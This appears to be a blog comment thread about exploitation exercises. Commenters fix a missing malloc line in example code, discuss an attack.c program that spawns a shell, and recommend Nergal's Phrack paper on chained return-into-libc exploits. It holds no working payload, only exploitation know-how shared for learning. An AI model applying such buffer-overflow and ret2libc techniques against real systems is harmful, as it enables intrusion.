if (!(buff = malloc(bsize))) {printf("Can't allocate memory.\n");exit(0);}
This should go right after your definition of bsize (line 26 in both examples should be fine). Without this line, the app segfaults... which makes sense, in hindsight. We're trying to use heap space that we haven't allocated! Unfortunately, as todb mentioned in a previous post, the technique in attack.c doesn't seem to work, anyway. A future endeavor, perhaps.
Additionally, with reference to ret2libc attacks, there's an excellent paper by Nergal in phrack 58, titled "The advanced return-into-lib(c) exploits: PaX case study". It can be found over here. It goes into detail about techniques to chain multiple ret2libc calls together, in addition to an in-depth discussion about PaX.
Thanks a Lot!!!!!!!!!!
ReplyDeleteBelgian (site or people) are the best one!
I hope we meet one day to discuss about this book or plan some project :)
But before I must improve myself...
It's worth mentioning that attack.c forks a new shell every time its run, so you should be exiting it after every attack/victim run. A better solution would have been to export BUF, instead of forking a new shell.
ReplyDeleteIt's also worth mentioning that the authors C is not very good and should not be used as a good reference point.